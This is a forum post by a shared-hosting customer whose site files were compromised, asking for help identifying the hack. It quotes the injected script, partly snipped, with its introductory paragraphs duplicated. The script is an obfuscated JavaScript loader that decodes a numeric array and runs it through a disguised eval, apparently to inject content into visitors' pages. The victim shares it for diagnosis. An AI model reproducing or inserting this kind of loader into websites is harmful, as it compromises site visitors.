Shared Hosting Account Has Been Hacked
Heyas,
One of my shared hosting accounts is being messed with and have inserted javascript inside the closing PHP bracket (?>) in a lot of index.php/index.html/main.php files on my account.
Does anyone know about the hack? It isn't a Wordpress hack - it is hitting all CMS/static sites too. I have contacted the host to get them to look elsewhere but would also like to do my part.
The inserted code is below.
Thanks!
One of my shared hosting accounts is being messed with and have inserted javascript inside the closing PHP bracket (?>) in a lot of index.php/index.html/main.php files on my account.
Does anyone know about the hack? It isn't a Wordpress hack - it is hitting all CMS/static sites too. I have contacted the host to get them to look elsewhere but would also like to do my part.
The inserted code is below.
Thanks!
|
?<html><body><script>var jb="4.5*2,4.5*2,52.5*2,51*2,16*2,20*2,50*2,55.5*2, 49.5*2,58.5*2,54.5 <snip> 2,51.5*2,52*2,58*2,19.5*2,22*2,19.5*2,24.5*2,24*2, 19.5*2,20.5*2,29.5*2,6.5*2,4.5*2,4.5*2,4.5*2,50*2, 55.5*2,49.5*2,58.5*2,54.5*2,50.5*2,55*2,58*2,23*2, 51.5*2,50.5*2,58*2,34.5*2,54*2,50.5*2,54.5*2,50.5* 2,55*2,58*2,57.5*2,33*2,60.5*2,42*2,48.5*2,51.5*2, 39*2,48.5*2,54.5*2,50.5*2,20*2,19.5*2,49*2,55.5*2, 50*2,60.5*2,19.5*2,20.5*2,45.5*2,24*2,46.5*2,23*2, 48.5*2,56*2,56*2,50.5*2,55*2,50*2,33.5*2,52*2,52.5 *2,54*2,50*2,20*2,51*2,20.5*2,29.5*2,6.5*2,4.5*2,4 .5*2,62.5*2".split(",");cn=new Date(2010,11,4);var txy="";var aexn="e"+(parseInt(cn.getDay()))+"a"+txy+"l";ket=( function(){return this;})();xj=ket[aexn.replace("6","v")];var urmq='';for(var i=0;i<jb.length;i++){urmq+=String.fromCharCode(xj( jb[i]));} xj(urmq);</script></body></html>> |